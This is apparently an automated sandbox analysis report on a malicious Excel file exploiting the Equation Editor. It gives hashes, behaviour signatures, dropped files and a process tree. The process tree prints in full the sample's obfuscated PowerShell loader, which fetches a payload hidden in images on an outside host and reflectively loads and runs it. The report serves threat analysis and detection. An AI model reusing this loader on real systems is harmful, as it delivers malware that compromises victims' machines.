Analysis

  • max time kernel
    29s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    15/03/2024, 02:47

General

  • Target

    c2d92f57c551932f68c704db32918b01eedef76decd521782ddbcc1aa6087588.xls

  • Size

    47KB

  • MD5

    36cb1d700227ba18a13425d53c4f448f

  • SHA1

    9a1c421150c716aa9eb24944c53b42f3d04faace

  • SHA256

    c2d92f57c551932f68c704db32918b01eedef76decd521782ddbcc1aa6087588

  • SHA512

    67cb00dad7876d5b1de7b5f58803632b46e800d525f348d83f93edf17d0399223a909103437284fc2318a4cfee52c9d5bd5b897b99385059d7f0d08a2c67f2dc

  • SSDEEP

    768:1XyBP0Vluaxk9OQUbcyA710rcMF8BM2rc4ozFBLImJB96:1X68XusoOQ4cy/cY8BMvHLrB9

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Abuses OpenXML format to download file from external location
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c2d92f57c551932f68c704db32918b01eedef76decd521782ddbcc1aa6087588.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2032
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1668
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:924
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$leitariga = 'ZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAB7ACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAbABpAG4AawBzACkAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgAEAAKAApADsAIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAIAA9ACAAJABsAGkAbgBrAHMAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAJABsAGkAbgBrAHMALgBMAGUAbgBnAHQAaAA7ACAAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBrACAAaQBuACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACkAIAB7ACAAdAByAHkAIAB7ACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAArAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGwAaQBuAGsAKQAgAH0AIABjAGEAdABjAGgAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQAgAH0AOwAgAHIAZQB0AHUAcgBuACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAB9ADsAIAAkAGwAaQBuAGsAcwAgAD0AIABAACgAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwAxADYAJwAsACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQA0AC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwA1ADAAJwApADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAAkAGwAaQBuAGsAcwA7ACAAaQBmACAAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBQAFIATwBKAEUAVABPAEEAVQBUAE8ATQBBAEMAQQBPAC4AVgBCAC4ASABvAG0AZQAnACkAOwAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AUwBTAEkASwAvAHIAbABrAC8AcABwAG0AYQB4AC8ANwAwADEALgAzADQAMgAuADUAOAAxAC4ANwA0ADEALwAvADoAcAB0AHQAaAAnACAALAAgACcAMQAnACAALAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAgACwAIAAnAEsASQBTAFMAJwAsACcAUgBlAGcAQQBzAG0AJwAsACcAJwApACkAfQAgAH0A';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $leitariga));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/753/713/original/new_image.jpg?1709908316', 'https://uploaddeimagens.com.br/images/004/753/714/original/new_image.jpg?1709908350'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SSIK/rlk/ppmax/701.342.581.741//:ptth' , '1' , 'C:\ProgramData\' , 'KISS','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1636

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      7bdb99096a11b4f9daae912180283760

      SHA1

      1a69f741776b481e7678a6b98d22d888d6ae8da1

      SHA256

      302e6f7de9e0f200fd47ec90955e2237a34752a2199cb06d23d7cad0f3ed4073

      SHA512

      5003cb03838151be9c8f26d32df2f072e76c7727fbecee63116c6b0dbfd4f42146f425748dbf640ee6b827fc85a61f9b3c943ba01b00dd2782b0479a1f4afe23

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      e7bf02c025e6e622dfd06da6210501bb

      SHA1

      5ed2dfbe0b3d1564de9a917ac4efb7d54c40bd34

      SHA256

      a9055964998950fd7bc96d32e11138a8dace9e3c33c58657b59895cda991ef4b

      SHA512

      104c9f84376d253625a0872a0fb7a8880a984c5d4d53f3ef774aa8dbac790d115289cab0b7f10d0a9af811f951cb388fdd0999d7913853209866383d201a36df

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      3a36eb968f02cfa2765fb7f2dc097c39

      SHA1

      fa9a7ec62a189f997d279e043966815878dfc7f4

      SHA256

      5aaefd24965a6adf7a2367e4d367be6b522b259e6b3f21fb021f4f4cdf8ebeb3

      SHA512

      217e3e40c0d0b5db388265a4cead5a23902d4d8026458f1701b65cf525098fc6395d21e9aec1166251a85e408fcc3faecec82aa9c1dea8377a9d96d0d06b527f

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{7A22AD0C-3EDE-4D3C-B0A1-B4C249037C93}.FSD

      Filesize

      128KB

      MD5

      89955cc321f26843380d0b2c7065316d

      SHA1

      cb0ad69eeaa26ed70484bc1977e344b7e91a11ca

      SHA256

      4728ea73dc1a4faaed5059b1dd92f8077e6154515df2f65e0d966e239ff7b006

      SHA512

      366c431ea47492a27b7f6e8a2cc42e104d3bff65e66595eb3ccbb8d1863a9d9a64f8573086c15d84a127ccab9224fa3530605ddda7195652f802f111161d5e72

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\myworldialwaysurlovertohearuaremyworldbecauseitrulyloveyoualotbecause_____youaremybabyandalwaysloverhersoomuchtruly[1].doc

      Filesize

      70KB

      MD5

      cae8bb9d33e2340998ba5f75ad37f803

      SHA1

      75e142060680509acade4921ea417e1d438a34fd

      SHA256

      aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030

      SHA512

      5b5ba31eef6383798733fcb5bbbbe0b28a35b8962207b8a08c494aa18ce48cf4f296af18299b8ddff51b7d6eb07d4864b3ddf4f95bebc8c76959f8ba1e0f8d98

    • C:\Users\Admin\AppData\Local\Temp\CabAB5E.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarAD39.tmp

      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

    • C:\Users\Admin\AppData\Local\Temp\{B9FBF85B-D8D7-4223-874E-9D062E72EF50}

      Filesize

      128KB

      MD5

      ba7561099d5d925337a0c3618d8acc9e

      SHA1

      84769f369cb94b0326041f7989c1b0b5a181275f

      SHA256

      dd10e3a0484fae0b4f3d96f1c7c5802a68bedbd36220920eda68d7e43e23f6c3

      SHA512

      a7f407d5acf25e27d2cd012b56dd509adf4beb54e7c838bb44866a937c670ce71e5fa05f9ac7152c58230a61574a60c0815891bbeb110b772a9d13bc148e725d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      00fc0403f98ac0404dc312d09ba05bf4

      SHA1

      5626fcc3c7d435f8bd0e3c44d7dfc243575f6023

      SHA256

      0a382b0d4f8482fff179ac08126e90481f5c90a172b6504a075851c38357bf21

      SHA512

      96147cebf037c296f135d6da9fd91be40ca0a6052160078717438868e391c456a598772e57053461e81ec241a487a88fd4aa192ae6274d6c9ebc3d5557640285

    • C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs

      Filesize

      33KB

      MD5

      da24a3f9677942db1e73b0ef5d2011a4

      SHA1

      0ee17d73b3e26fe1c8b6680b92c305a4d850685c

      SHA256

      98e179fe22de663f2f6127de1354c0d14609c43ca0e644f320310104585f90ce

      SHA512

      46549a6ee806cf7c48328e80b124928258bed5ad182618c25b4bcbf61173ace8eb502f28ce5bf4dd9ba862d988a1c3a95ec86c9ce539fab6c30318c525138615

    • memory/1636-107-0x000000006A500000-0x000000006AAAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1636-105-0x000000006A500000-0x000000006AAAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1636-106-0x0000000002450000-0x0000000002490000-memory.dmp

      Filesize

      256KB

    • memory/1824-187-0x000000006A500000-0x000000006AAAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1824-98-0x00000000025A0000-0x00000000025E0000-memory.dmp

      Filesize

      256KB

    • memory/1824-99-0x00000000025A0000-0x00000000025E0000-memory.dmp

      Filesize

      256KB

    • memory/1824-96-0x000000006A500000-0x000000006AAAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1824-97-0x000000006A500000-0x000000006AAAB000-memory.dmp

      Filesize

      5.7MB

    • memory/2032-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2032-1-0x000000007251D000-0x0000000072528000-memory.dmp

      Filesize

      44KB

    • memory/2032-185-0x000000007251D000-0x0000000072528000-memory.dmp

      Filesize

      44KB

    • memory/2900-5-0x000000007251D000-0x0000000072528000-memory.dmp

      Filesize

      44KB

    • memory/2900-3-0x000000002FA91000-0x000000002FA92000-memory.dmp

      Filesize

      4KB

    • memory/2900-186-0x000000007251D000-0x0000000072528000-memory.dmp

      Filesize

      44KB

    • memory/2900-7-0x0000000002E10000-0x0000000002E12000-memory.dmp

      Filesize

      8KB